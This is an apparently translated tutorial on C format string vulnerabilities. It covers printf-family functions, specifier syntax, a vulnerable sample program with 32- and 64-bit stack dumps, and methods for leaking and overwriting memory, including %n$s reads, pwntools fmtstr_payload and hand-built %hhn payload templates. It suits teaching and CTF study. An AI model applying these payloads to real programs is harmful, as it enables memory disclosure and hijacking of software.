format string vulnerability
Introduction to formatting strings
Common formatting string functions
function | Basic introduction |
---|---|
printf | Output to stdout |
fprintf | Output to the specified FILE stream |
vprintf | Format the output to stdout according to the parameter list |
vfprintf | Format the output to the FILE stream according to the parameter list |
sprintf | Output to string |
snprintf | Output the specified number of bytes to the string |
vsprintf | Format the output to the string according to the parameter list |
vsnprintf | Format and output the specified byte to the string according to the parameter list |
Common format string form
%[parameter][flags][field width][.precision][length]type
- Parameter: n $, get the specified parameter in the format string
- field width: the minimum width of the output
- precision: the maximum length of the output
- Length, the length of the output
- hh, output a byte
- h. Output a double byte
- type
- d/i, signed integer
- u. Unsigned integer
- X / x, hexadecimal
- o. Octal
- s. All bytes
- c. char type single character
- p. void * type, output the value of the corresponding variable. Printf ('% p', a) prints the value of variable a in the format of address, and printf ('% p', & A) prints the address of variable a.
- n. Do not output characters, but write the number of characters that have been successfully output to the variable indicated by the corresponding integer pointer parameter.
Principle verification
Sample program:
#include<stdio.h> int main() { char s[100] = "aaaa.%p.%p.%p.%p.%p.%p.%p"; printf(s); return 0; }
32 bit
Compile command:
gcc test.c -g -m32 -o test
Output result:
aaaa.0xf7ffc988.0xffffcf2a.0x56555595.0xffffcf2a.0xf7ffc984.0x61616161.0x2e70252e
Stack structure:
00:0000│ esp 0xffffcee0 —▸ 0xffffcef8 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p' 01:0004│ 0xffffcee4 —▸ 0xf7ffc988 (_rtld_global_ro+136) ◂— 0x8e 02:0008│ 0xffffcee8 —▸ 0xffffcf2a ◂— 0x0 03:000c│ 0xffffceec —▸ 0x56555595 (main+24) ◂— add ebx, 0x1a3f 04:0010│ 0xffffcef0 —▸ 0xffffcf2a ◂— 0x0 05:0014│ 0xffffcef4 —▸ 0xf7ffc984 (_rtld_global_ro+132) ◂— 0x6 06:0018│ eax 0xffffcef8 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
From top to bottom, there are parameters 0 ~ 6. Parameter 0 is the address of the format string, and the first 4 bytes of the format string are used as parameter 6 (depending on the situation due to different stack structure). Therefore, if the appropriate position of the format string is set as the target address, the data of the address can be operated.
64 bit
Compile command:
gcc test.c -g -m64 -o test
Output result:
aaaa.0x7fffffffde78.0x70.0x555555554770.0x7ffff7dced80.0x7ffff7dced80.0x2e70252e61616161.0x70252e70252e7025
Register:
RAX 0x0 RBX 0x0 RCX 0x555555554770 (__libc_csu_init) ◂— push r15 RDX 0x70 RDI 0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p' RSI 0x7fffffffde78 —▸ 0x7fffffffe21b R8 0x7ffff7dced80 (initial) ◂— 0x0 R9 0x7ffff7dced80 (initial) ◂— 0x0 R10 0x0 R11 0x0 R12 0x5555555545a0 (_start) ◂— xor ebp, ebp R13 0x7fffffffde70 ◂— 0x1 R14 0x0 R15 0x0 RBP 0x7fffffffdd90 —▸ 0x555555554770 (__libc_csu_init) ◂— push r15 RSP 0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p' RIP 0x555555554747 (main+157) ◂— call 0x555555554580
Stack structure:
00:0000│ rdi rsp 0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p' 01:0008│ 0x7fffffffdd28 ◂— '%p.%p.%p.%p.%p.%p' 02:0010│ 0x7fffffffdd30 ◂— '.%p.%p.%p' 03:0018│ 0x7fffffffdd38 ◂— 0x70 /* 'p' */ 04:0020│ 0x7fffffffdd40 ◂— 0x0
Since the 64 bit program first uses the rdi, rsi, rdx, rcx, r8 and r9 registers as the first six parameters of the function parameters, and the redundant parameters will be pressed on the stack in turn, the first six outputs are the values in the registers (aaaa is regarded as the format string parameters), and the first eight bytes of the format string are regarded as parameter 6.
Leak memory
Leak stack variable memory
Divulge the value of stack variable
Get stack is treated as the second n + 1 n+1 Value of n+1 Parameters:% n$x
Note:% x is actually the hexadecimal output of% d, corresponding to 32 bits, that is, 4 bytes; Under 64 bit operating system, only the last 32 bits of the partition will be truncated;% There is no problem with the association between P and system bits, so it is recommended to use% p.
Disclose the contents of the address corresponding to the stack variable
Get stack is treated as the second n + 1 n+1 Content of address corresponding to n+1 Parameters:% n$s
Leak arbitrary address memory
Get the value corresponding to the address addr (addr is the k-th parameter): addr%k$s
Overwrite memory
Note: overwriting memory can only cover the memory corresponding to an address, not the first few parameters. For the program that starts ASLR, the stack address should be disclosed in advance when overwriting a value on the stack.
pwntools generate payload
For the format string payload, pwntools also provides a class Fmtstr that can be used directly. For details, see http://docs.pwntools.com/en/stable/fmtstr.html , the functions we use more often are
fmtstr_payload(offset, {address:data}, numbwritten=0, write_size='byte')
- Offset indicates the offset of the format string
- Numbwriten indicates the number of characters that have been output
- write_size indicates the writing method, whether by byte, short or int, corresponding to hhn, hn and n. the default value is byte, that is, write by hhn.
Note: some problems will limit the time and cause the payload generated by pwntools to become invalid. Generally, this kind of problem can reduce the output length by modifying only the low address. At this time, it is necessary to manually construct the payload.
Manually construct a payload
Covering small numbers
For numbers less than the machine word length, if you put the address in front of the formatted string, the number of characters output will be greater than the size of the number, so you should put the address after it.
Take the number 2 as an example: aa%k$n[padding][addr]
Covering large numbers
It takes too long to directly output large numbers of bytes at one time for coverage. Therefore, it is necessary to split the large numbers into several parts for coverage respectively. For example, hhn is written in bytes or hn is written in double words.
Take the number of 32 bits written by hhn as an example. The form of payload is: [addr][addr+1][addr+2][addr+3][pad1]%k$hhn[pad2]%(k+1)$hhn[pad3]%(k+2)$hhn[pad4]%(k+3)$hhn